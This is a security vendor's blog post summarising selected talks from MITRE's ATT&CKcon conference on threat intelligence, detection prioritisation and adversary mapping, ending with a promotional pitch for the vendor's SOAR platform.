The MITRE ATT&CK framework needs no introduction. Over 80 percent of enterprises use ATT&CK, according to a 2020 study. First introduced in 2013, the framework established a standard for the infosec community to describe adversary tactics and techniques. There are now separate matrices for Enterprise, Mac/Linux, Cloud, ICS, Mobile, and Defense, and each of these matrices has grown in complexity over the course of time. The framework has evolved significantly over the years, adding new techniques, sub-techniques and mitigations to map the shifts in adversarial tactics. Take Resource Hijacking, for example. The technique was added in 2019 to classify the rising number of cryptojacking attacks, which rides on two megatrends in technology: cloud computing and cryptocurrency.
The ATT&CK framework has use cases in adversary emulation, threat intelligence, and detection and analytics. It’s built into D3’s Smart SOAR platform as well. In fact, we were the first SOAR vendor to fully embed the MITRE ATT&CK matrix. Our global event playbook parses MITRE TTPs from security events ingested by the platform, enabling kill chain-based threat hunting.
After nearly a three-year gap, MITRE held its third ATT&CKcon conference at the end of March. The two-day conference saw 72 presentation submissions from 16 countries – only 17 were selected by the program committee. Storytelling was one of the big themes of the conference. A number of talks focused on the importance of effective communication, and how the MITRE framework can help SecOps teams efficiently explain adversarial attack campaigns and intent. With a lot of the audience for the event logged in remotely, the conference generated plenty of wit and banter on Twitter, thanks to a meme contest.
If you were too busy to follow the conference, these are our picks for the most interesting presentations that are worth a watch.
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interactive Intrusion Campaigns
Jason Wood and Justin Swisher, Senior Researchers at Crowdstrike, provide a detailed breakdown of an interactive intrusion campaign against a Linux endpoint, based on real-world threat data. It provides a fascinating look at how threat actors use the command line to develop an understanding of the host’s infrastructure, try, and often fail in their attack campaign that lasts for days and weeks.
The presenters map individual command lines typed by the adversary to procedures, sub-techniques, techniques, and tactics. Taking inspiration from the book Start with Why by Simon Sinek, they try to understand adversarial intent and the techniques that are working for them.
“Every time an adversary runs a command, they tell us something about themselves, about what they’re trying to do,” says Jason. From intrusion activity logged over a thousand keyboard intrusions and mapped to ATT&CK, they try to understand how attack trends have changed over time. This helps them develop a better understanding of techniques used by the adversary and analyze gaps in their coverage where they could do better detection.
Intelligence Failures of Lincoln’s Top Spies – What CTI Analysts Can Learn From The Civil War
Selena Larson, Senior Threat Intelligence Analyst at Proofpoint, highlights the importance of vetting your OSINT to eliminate HiPPO (highest paid person’s opinion) bias and how a failure to do so can literally change the course of history. The presentation draws from historical events – specifically, the intelligence failure of Allan Pinkerton, who worked as Union Intelligence Chief under former US president Abraham Lincoln from 1861-62. Pinkerton had the tendency to be prosaic and flowery, in addition to exaggerating enemy troop numbers to please his boss. Peppered with snippets from a book written by Douglas Waller, titled Lincoln’s Spies, the presentation stresses the importance of validating your sources, using the MITRE ATT&CK framework, and practicing BLUF (bottom line up front) for effective threat intelligence reporting.
Knowledge for the Masses: Storytelling with ATT&CK!
Trellix’s Ismael Valenzuela, Sr. Principal Engineer and Head of the Applied Countermeasures (AC3) team, and Jose Luis Sanchez Martinez, Threat Hunting Specialist, emphasize the criticality of effective storytelling in creating impactful threat reports, and how the lack of it can lead to partial understanding and limit defensive actionability. They also stress the importance of telling a story appropriate to the audience – actionable information for SOC analysts and incident responders, operational intelligence for SOC managers, and strategic information for security leaders. They showcase some of their work from AC3 Threat Sightings, a one-year-old initiative with the goal of increasing the understanding of cyber threats using ATT&CK. Some of the examples are illuminating — like the visualization showing a play-by-play timeline of a ransomware attack intrusion made using Gource, an open-source mind-mapping tool. Another example uses Maltego, an OSINT and graphical analysis tool.
Read: 10 Reasons to Use MITRE ATT&CK (and how to get started)
It’s Just a Jump to the Left (of Boom): Prioritizing Detection Implementation with Intelligence and ATT&CK
The presentation by Lindsay Kaye, the director of operational outcomes for Insikt Group at Recorded Future, and Scott Small, Senior Threat Intelligence Consultant, Recorded Future emphasizes the importance of threat intel teams in managing security operations. According to the presenters, intelligence teams are critical in a security maturity journey and bridging gaps between offensive and defensive security. Tighter feedback loops between intel, offensive and defensive teams provide the quickest and most measurable improvements in security, they say. Using data derived from ATT&CK coverage of more than a dozen detection repositories and technologies, they use it to understand the current defensive landscape and provide guidance on where to implement behavioral detections, and the operational value of the different types of TTP intelligence sources.
Using the MITRE ATT&CK framework as a lens, the presentation explores the anatomy of a ransomware attack, based on the tactics and techniques used (Domain Access, Stolen Credentials, Phishing, Purchased Accesses through Initial access brokers, etc) by adversaries. Lindsay says that there are a lot of opportunities for defenders to focus on developing detection before the Boom – when the ransomware payload is dropped and data is exfiltrated/encrypted. Threat hunters must focus on mitigations at the Lateral Movement, Discovery, Escalation, Persistence, and Reconnaissance stages.
This presentation was particularly actionable as it released an open-source tool intended to speed up, identify and close control gaps. The tool, called Control Validation Compass helps defenders search over 9,000+ publicly accessible detection rules and 2,100+ offensive security tests aligned with 500+ ATT&CK sub(techniques). The tool is designed to speed the process of identifying security control gaps and validate the effectiveness of new (or existing) policy/process controls.
Read: Four Ways to Leverage MITRE ATT&CK in Your Security Operations
The ATT&CK Latin American APT Playbook
We don’t get to hear much of what’s going on in Latin America, except in the odd news report that notes Latin America’s abundance of hacking talent. This is exactly why this presentation is a compelling watch. Santiago Pontiroli, Security Researcher, Kaspersky, and Dmitry Bestuzhev, Head of Global and Research Analysis Team in Latin America, Kaspersky shed light on some of the more notorious cyber threat actors in Latin America – such as Machete, Poseidon, Blind Eagle, Puppeteer, TA505, and others. These attack groups range from nation-state actors to mercenaries for hire. The presentations explore the TTPs used by each group and highlight some of their unique and inventive procedures used, some of which do not have a technique to map to.
The Next Generation SOAR platform with MITRE ATT&CK Inside
MITRE ATT&CK is fully embedded into D3 SOAR so that you have 20/20 vision of cybersecurity risks affecting your organization at the event and incident level. Our MITRE ATT&CK Monitor provides a global view of attack trends, helping you stay one step ahead of your adversaries. It also includes the ability to create new tactics and techniques for security events that don’t map to the ATT&CK framework. Speak to a specialist to find out how your SOC team can catch threats faster.